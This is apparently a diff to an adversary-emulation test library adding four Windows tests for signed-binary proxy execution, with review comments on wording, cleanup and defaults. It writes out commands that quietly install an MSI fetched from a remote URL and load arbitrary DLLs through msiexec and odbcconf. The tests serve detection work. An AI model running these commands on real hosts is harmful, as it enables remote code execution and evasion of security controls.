diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 6c51bc99..ea0f4256 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -33,6 +33,14 @@ Several other binaries exist that may be used to perform similar behavior. (Cita
- [Atomic Test #3 - Register-CimProvider - Execute evil dll](#atomic-test-3---register-cimprovider---execute-evil-dll)
+- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file](#atomic-test-4---msiexecexe---execute-local-msi-file)
+
+- [Atomic Test #5 - Msiexec.exe - Execute Remote MSI file](#atomic-test-5---msiexecexe---execute-remote-msi-file)
+
+- [Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-6---msiexecexe---execute-arbitrary-dll)
+
+- [Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-7---odbcconfexe---execute-arbitrary-dll)
+
@@ -97,4 +105,88 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
+
+
+
+## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
+Execute arbitrary MSI file. Commonly seen in application installation.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218.msi|
+
+#### Run it with `command_prompt`!
+```
+msiexec.exe /q /i "#{msi_payload}"
+```
+
+
+
+
+
+
+## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | String | http://site.com/file.msi|
+
+#### Run it with `command_prompt`!
+```
+msiexec.exe /q /i "#{msi_payload}"
+```
+
+
+
+
+
+
+## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
+Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+
+#### Run it with `command_prompt`!
+```
+msiexec.exe /y "#{dll_payload}"
+```
+
+
+
+
+
+
+## Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL
+Execute arbitrary DLL file stored locally.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+
+#### Run it with `command_prompt`!
+```
+odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+```
+
+
+
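Review bot: The description of Atomic Test #6 repeats "Commonly seen in application installation" from Test #4, but the command here is `msiexec.exe /y "#{dll_payload}"`, which has msiexec call the DLL's DllRegisterServer export instead of installing a package. Suggest rewording the description to say so, so that a reader building a detection from this page knows the behaviour to look for is msiexec loading a DLL via `/y`. None of the four new tests lists a cleanup step either: #4 and #5 can leave an installed product behind, and #6 and #7 leave a registered DLL, so a cleanup command per test (for example `msiexec.exe /z` on the same DLL for #6) would keep repeated runs on one host consistent.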
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 3909a4dc..0be10657 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -58,3 +58,72 @@ atomic_tests:
name: command_prompt
command: |
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
+
+- name: Msiexec.exe - Execute Local MSI file
+ description: |
+ Execute arbitrary MSI file. Commonly seen in application installation.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+ executor:
+ name: command_prompt
+ command: |
+ msiexec.exe /q /i "#{msi_payload}"
+
+- name: Msiexec.exe - Execute Remote MSI file
+ description: |
+ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: String
+ default: http://site.com/file.msi
+ executor:
+ name: command_prompt
+ command: |
+ msiexec.exe /q /i "#{msi_payload}"
+
+- name: Msiexec.exe - Execute Arbitrary DLL
+ description: |
+ Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: |
+ msiexec.exe /y "#{dll_payload}"
+
+- name: Odbcconf.exe - Execute Arbitrary DLL
+ description: |
+ Execute arbitrary DLL file stored locally.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: |
+ odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
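Review bot: The default for `msi_payload` in the remote test, `http://site.com/file.msi`, names a domain this repository does not appear to control and uses plain HTTP, so running the test with defaults has msiexec quietly install whatever that host serves at the time. Suggest removing the default so the operator must supply a URL, or pointing it at a file hosted by this project over HTTPS. The argument description could also read "URL of MSI file to execute", since the type is String and not Path. Separately, the local tests default to `T1218.msi` and `T1218-2.dll` under `src\Win32`, and the patch as shown adds neither file, so please confirm both are already in the tree.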
diff --git a/atomics/index.md b/atomics/index.md
index 5eb5240d..2be43da7 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -342,6 +342,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -710,6 +714,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- [T1153 Source](./T1153/T1153.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 8144122a..b6246769 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -10237,6 +10237,66 @@ defense-evasion:
name: command_prompt
command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}
\n"
+ - name: Msiexec.exe - Execute Local MSI file
+ description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Remote MSI file
+ description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
+ in application installation, commonly seen in malware execution.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: String
+ default: http://site.com/file.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
+ installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /y \"#{dll_payload}\" \n"
+ - name: Odbcconf.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
+'
T1216:
technique:
x_mitre_data_sources:
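Review bot: The three msiexec entries in this index carry a trailing space before the newline (`\"#{msi_payload}\" \n` and `\"#{dll_payload}\" \n`), while the odbcconf entry has none, which points to trailing whitespace on those command lines in T1218.yaml. Suggest trimming it in the source file and updating the index to match, so that all four commands are recorded exactly as they are meant to be typed.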
@@ -20397,6 +20457,66 @@ execution:
name: command_prompt
command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}
\n"
+ - name: Msiexec.exe - Execute Local MSI file
+ description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Remote MSI file
+ description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
+ in application installation, commonly seen in malware execution.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: String
+ default: http://site.com/file.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
+ installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /y \"#{dll_payload}\" \n"
+ - name: Odbcconf.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
+'
T1216:
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index a956d34f..181ee513 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -132,6 +132,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -572,6 +576,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)